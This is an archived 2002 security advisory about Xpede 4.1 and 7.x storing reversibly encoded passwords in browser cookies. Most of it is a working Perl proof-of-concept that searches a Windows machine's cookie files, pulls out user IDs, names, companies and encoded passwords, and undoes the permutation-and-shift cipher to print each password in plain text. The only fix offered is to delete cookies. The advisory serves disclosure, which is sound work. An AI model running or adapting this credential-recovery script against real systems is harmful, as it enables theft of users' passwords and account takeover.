Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: web5208.htm

Xpede cookie password decode



25th Mar 2002 [SBWID-5208]
COMMAND

	Xpede cookie password decode

SYSTEMS AFFECTED

	Xpede 4.1 and 7.x series

PROBLEM

	Gregory Duchemin [c3rb3r@hotmail.com] posted :
	

	This code will decipher  Xpede  cookie  based  passwords.  It  makes  it
	dangerous since the are many cross-site scripting vulns in the program.
	

	 Proof of concept (password recovery from cookies)

	 ================

	

	#!/usr/bin/perl

	# Xdeep.pl, search for and decipher Xpede 

	passwords stored in these damn cookies

	# Pr00f of concept, not to be used for illegal purposes.

	#

	# Author: Gregory Duchemin Aka c3rb3r // March 

	2002

	#

	#output format

	

	format STDOUT =

	+ Userid: @<<<<<<<

	$userid

	+ Realname: @<<<<<<<<<<<<<<<<<<<<<<<<<

	$realname

	+ Company: @<<<<<<<<<<<<<<<<<<<<

	$company

	+ Encoded password: @<<<<<<<<<<<<<<<<<<<<

	$password

	.

	

	

	#Cookie fingerprint

	$signature=\"defPWD\";

	

	

	

	#decoding stuff

	@PERMU=(\'9\', \'11\', \'2\', \'6\', \'4\', \'10\', \'1\', \'8\', \'7\', \'3\', \'5\');

	@ALPHA=

	(\'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\', \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\'

	, \'P\', \'Q\', \'R\',\'S\', \'T\', \'U\', \'V\', \'W\', \'X\', \'Y\', \'Z\', \'a\',\'b\',\'c\',\'d\',\'

	e\',\'f\',\'g\',\'h\',\'i\',\'j\',\'k\',\'l\',\'m\',\'n\',\'o\',\'p\',\'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\'

	,\'z\');

	@SHIFT=(9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23);  

	

	

	#Change the following path to match your system

	@COOKIE= glob

	(\'c:\\winnt\\Profiles\\*\\Cookies\\*@*.txt\');

	

	

	

	$i=$count=0;

	@FOUND= (\'nope\');

	

	print \"\\n\\nXdeep.pl  Xpede cookies finder and decoder 

	\\n\\n-- Gregory Duchemin (Aka C3rb3r) ^ Feb 2002 --

	\\n\\n\\n\";

	

	foreach $try (@COOKIE) {

	$count++;

	if (open(handle, $try)) 

	{

	@lines=<handle>;

	if (!index($lines[0], $signature))

	{

	printf(\"\\n+ Xpede cookie found ! yep :)  <=>  %s\\n\", 

	$try);

	$FOUND[$i]=$try;

	$i++;

	}

	close(handle);  

	}

	

	}

	

	printf(\"\\n+ %d files checked.\\n\", $count);

	

	if (! $i)

	{

	print \"\\n\\n- No Xpede cookie found, sorry\\n\\n\";

	exit(0);

	}

	

	printf(\"\\n\\n+ %d Cookie(s) found.\\n\", $i);

	print \"\\n\\n\\n[Press return]\\n\";

	$try=<STDIN>;

	

	foreach $try (@FOUND) {

	

	if (open(handle, $try)) 

	{

	@lines=<handle>;

	

	$userid= @lines[55];

	$realname=@lines[64];

	$password=@lines[46];

	$company=@lines[28];

	

	$realname =~ s/\\+/ /;

	$userid =~ s/\\+/ /;

	$password =~ s/\\+/ /;

	$company =~ s/\\+/ /;

	

	$userid =~ s/%([a-f0-9][a-f0-9])/pack(\"C\", hex

	($1))/eig; 

	$realname =~ s/%([a-f0-9][a-f0-9])/pack(\"C\", hex

	($1))/eig; 

	$password =~ s/%([a-f0-9][a-f0-9])/pack(\"C\", hex

	($1))/eig; 

	$company =~ s/%([a-f0-9][a-f0-9])/pack(\"C\", hex

	($1))/eig; 

	

	printf \"\\n+ Found Xpede cookie :\\n>> %s <<\\n\\n\", $try;

	write;

	print \"\\n\\n! Cr4cking 1n progr3ss ... \\n\";

	

	@list=split //, $password;

	

	

	

	

	if (length($password) > 12 ) 

	{

	$MAX = 11;

	$DIFF = length($password)-1-$MAX;

	for ($i = 0; $i < ($DIFF); $i++) {$REST = $REST.$list

	[$i]; }

	splice(@list, 0, ($DIFF));

	printf \"\\n+ Clear part is %s\\n\", $REST;

	}

	else {$MAX = length($password)-1;printf \"\\n- No clear 

	part found \\n\";}

	

	

	

	for ($i=0; $i<$MAX; $i) { $temp_pass = 

	$temp_pass.$list[$PERMU[$i++]-1]; }

	printf \"\\n+ Permutations give %s\\n\", $temp_pass;

	

	

	@list=split //, $temp_pass;

	for ($i=0; $i<$MAX; $i++) 

	{

	$b = ord($list[$i]);

	$c = $SHIFT[$i];

	$flag=0;

	

	

	for ($z=0; $z<52; $z+=1) 

	{

	 if (ord($ALPHA[$z]) == $b) { $a = ord($ALPHA

	[($z+$c)%52]);$flag=1;}

	} 

	

	if (!$flag) {$a = $b;}

	

	

	$decode = $decode.chr($a);

	printf \"\\n+ %s Shift(%d) \\t --> \\t%s\", chr($b), $c, chr

	($a);

	}

	

	printf \"\\n\\n+ Shifting with secret key give %s\\n\", 

	$decode; 

	printf \"\\n! Password is \\\"%s\\\"\\n\\n\", $decode.$REST;

	printf \"\\n\\n- End.\\n\\n\";

	

	$decode=$REST=$temp_pass=\"\";

	close(handle);

	

	print \"\\n\\n[Press return]\\n\";

	$try=<STDIN>;

	}

	}

	

SOLUTION

	Remove cookies until patch is released


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH